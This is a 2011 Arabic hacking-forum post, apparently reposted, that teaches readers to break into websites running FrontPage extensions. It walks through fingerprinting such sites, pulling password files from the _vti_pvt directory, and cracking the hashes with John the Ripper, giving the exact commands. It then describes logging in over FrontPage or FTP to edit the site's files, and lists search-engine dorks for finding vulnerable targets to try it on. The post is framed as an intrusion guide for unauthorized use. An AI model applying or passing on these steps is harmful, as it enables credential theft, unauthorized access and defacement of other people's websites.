بسم الله الرحمن الرحيم
" اختراق المواقع التي تدعم الفرونت بيج "
<منقول من منتدى إعصار>
<الكاتب: المدمر>
اكثر منا يعلم ان هذه الثغرة خاصة بنظام//
NT - Unix
1- وسف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpage أم لا؟
بعدة طرق ولن أذكر إلا الأسهل:
- بالذهاب إلى موقع netcraft
http://www.netcraft.com/وكتابة اسم الموقع وبعد البحث سوف يظهر
mod_frontpage/x
x=(رقم الإصدار الخاص بالفرونت بيج)
- عن طريق إضافة جملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/
نضيف الجملة ليصبح بهذه الطريقة
http://www.almodammer.com/_vti_inf.htmlوبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج الفرونت بيج
- وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا
بإضافة
vti_cnf_/
بعد عنوان الموقع كهذا المثال:
http://www.almodammer.com/_vti_cnfواضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به
--------------------------------------------------
2- ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟
بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك
يعني وعلى سبيل المثال
http://www.almodammer.com/يدعم fontpage طيب نذهب إلى ملف vti_pvt_
كذا يعني
http://www.almodammer.com/_vti_pvtوأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============
ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
username:passwd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password
وهذا مضمون الملف
operator:hi9LHn9wAMuKM
حيث اسم المستخدم:operator
الباسوورد المشفرة هي:hi9LHn9wAMuKM
ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
وهذا يتم ببرامج كثير
=(Crack Jack)=
=(John The Ripper)=
راح نستخدم الأفضل والأكثر تداولا وهو
John The Ripper
لتحميل البرنامج من هذا الموقع::
http://www.openwall.com/johnكيف تفك التشفير بهذا البرنامج
أول شي تروح تنقل البرنامج إلى مجلد
\:c
بعدين تفتح مجلد RUN
وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها
إذهب إلى
ابدأ start
تشغيل run
اكتب الأمر
command
اضغط على Enter وبعدها راح يفتح
إطار الـDoS
اذهب إلى مجلد RUN
وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر
..cd
حتى توصل
<\:c
بعدين اكتب
cd john
اضغط على Enter
وراح يظهر لك بهذا الشكل
<c:\john
واكتب
cd RUN
وبتدخل المجلد ليصبح بهذه الطريقة
<c:/john/RUN
ألحين نكتب أوامر برنامج John The Ripper
وهي
====
john -i:all passd.txt
--------------------------
يبحث لك عن جميع الأنواع والاحتمالات
====
john -i:Alpha passwd.txt
----------------------------------
يبحث عن الأحرف الصغيرة
====
john -i:Digits passwd.txt
----------------------------------
يبحث عن الأرقام
====
john -single passwd.txt
---------------------------------
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم
--------------------------------------------------------------------------------
وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى
john.pot
الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
--------------------------------------------------------------------------------
إنت ألحين مستريح عندك username والـpassword
وش بقالك ؟!!
يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
(1)
frontpage
بعدين
file وتذهب إلى
open web وتضيف
الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك
(2)
من FTP
وعليك ببرامج الـFTP المنتشرة
كالـws-ftp
والـpro ftp
والمزيد ...
ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك
======================================
وألحين أكيد تبون تجربون على موقع أقولكم روحوا google
http://www.google.com/واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة
وعندك محرك بحث
http://www.altavista.com/تكتب في محرك البحث
link:service.pwd
أو..
link:adminstrators
وغيرها من الملفات الاحتمال وجود password فيها.
انتهى،،،
بالتوفيق
الخميس 10 فبراير 2011, 6:53 am من طرف 
